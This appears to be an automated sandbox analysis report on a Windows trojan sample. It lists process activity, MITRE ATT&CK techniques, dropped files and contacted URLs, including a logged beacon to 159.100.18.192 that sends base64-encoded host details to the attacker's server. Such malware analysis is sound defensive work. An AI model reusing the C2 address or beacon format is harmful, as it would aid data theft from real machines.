Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		1
Masquerading		11
Input Capture		21
Security Software Discovery		Remote Services11
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		41
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
Process Injection		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync32
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574722 Sample: AyqwnIUrcz.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 56 48 www.google.com 2->48 58 Multi AV Scanner detection for submitted file 2->58 9 AyqwnIUrcz.exe 179 2->9         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 9->40 dropped 42 C:\Users\user\AppData\Local\...\System.dll, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\vulkan-1.dll, PE32+ 9->44 dropped 46 14 other files (none is malicious) 9->46 dropped 60 Drops large PE files 9->60 13 IoNixNginx.exe 3 9->13         started        signatures6 process7 dnsIp8 52 www.google.com 172.217.19.228, 443, 49771 GOOGLEUS United States 13->52 54 159.100.18.192, 49867, 80 DE-FIRSTCOLOwwwfirst-colonetDE Germany 13->54 16 powershell.exe 35 13->16         started        19 powershell.exe 13->19         started        21 powershell.exe 13->21         started        23 21 other processes 13->23 process9 dnsIp10 56 Loading BitLocker PowerShell Module 16->56 26 conhost.exe 16->26         started        28 conhost.exe 19->28         started        30 conhost.exe 21->30         started        50 chrome.cloudflare-dns.com 172.64.41.3, 443, 49807, 49812 CLOUDFLARENETUS United States 23->50 32 conhost.exe 23->32         started        34 conhost.exe 23->34         started        36 conhost.exe 23->36         started        38 18 other processes 23->38 signatures11 process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AyqwnIUrcz.exe18%ReversingLabsWin32.Trojan.Malgent

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\IoNixNginx.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://crbug.com/dawn/13930%Avira URL Cloudsafe
https://search.seznam.sk/favicon.ico0%Avira URL Cloudsafe
http://159.100.18.192/login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhl0%Avira URL Cloudsafe
http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=0%Avira URL Cloudsafe
https://www.givero.com/suggest?q=0%Avira URL Cloudsafe
https://crbug.com/12149230%Avira URL Cloudsafe
https://suggestplugin.gmx.co.uk/s?q=0%Avira URL Cloudsafe
https://crbug.com/dawn/4020%Avira URL Cloudsafe
https://crbug.com/1338622.0%Avira URL Cloudsafe
https://crbug.com/new0%Avira URL Cloudsafe
https://crbug.com/dawn/12890%Avira URL Cloudsafe
https://crbug.com/dawn/7760%Avira URL Cloudsafe
https://crbug.com/tint.0%Avira URL Cloudsafe
http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=0%Avira URL Cloudsafe
https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search0%Avira URL Cloudsafe
http://search.imesh.net/music?hl=0%Avira URL Cloudsafe
http://l.twimg.com/i/hpkp_report0%Avira URL Cloudsafe
https://cl.search.yahoo.com/favicon.ico0%Avira URL Cloudsafe
http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p0%Avira URL Cloudsafe
https://crbug.com/dawn/6330%Avira URL Cloudsafe
http://www.neti.ee/cgi-bin/otsing?query=0%Avira URL Cloudsafe
https://crbug.com/dawn/5820%Avira URL Cloudsafe
https://crbug.com/dawn/10710%Avira URL Cloudsafe
https://bugs.chromium.org/p/dawn/issues/detail?id=6900%Avira URL Cloudsafe
http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=0%Avira URL Cloudsafe
https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating0%Avira URL Cloudsafe
https://crbug.com/dawn/10830%Avira URL Cloudsafe
https://crbug.com/dawn/3430%Avira URL Cloudsafe
https://crbug.com/dawn/3420%Avira URL Cloudsafe
https://search.goo.ne.jp/cdn/common/img/favicon.ico0%Avira URL Cloudsafe
http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=0%Avira URL Cloudsafe
http://search.imesh.net/favicon.ico0%Avira URL Cloudsafe
https://crbug.com/tint/10030%Avira URL Cloudsafe
https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search0%Avira URL Cloudsafe
https://crbug.com/dawn/7920%Avira URL Cloudsafe
http://arianna.libero.it/search/abin/integrata.cgi?query=0%Avira URL Cloudsafe
https://crbug.com/dawn/6730%Avira URL Cloudsafe
https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
https://www.yandex.ua/chrome/newtab0%Avira URL Cloudsafe
http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    www.google.com
    		172.217.19.228
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://159.100.18.192/login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhlfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
        		high
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
          		high
          https://fr.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
            		high
            https://search.seznam.sk/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://doh.familyshield.opendns.com/dns-queryIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
              		high
              https://crbug.com/newIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hk.search.yahoo.com/searchIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                		high
                https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                  		high
                  https://crbug.com/dawn/402IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://crbug.com/dawn/1393IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://crbug.com/dawn/1276IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                    		high
                    https://crbug.com/1338622.IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://dns11.quad9.net/dns-queryIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                      		high
                      https://crbug.com/1214923IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://suggestplugin.gmx.co.uk/s?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ca.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                        		high
                        https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                          		high
                          http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
